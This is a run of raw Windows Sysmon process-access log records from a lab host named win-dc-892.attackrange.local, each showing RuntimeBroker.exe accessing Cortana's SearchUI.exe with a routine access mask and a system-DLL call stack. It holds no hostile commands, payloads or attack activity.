12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 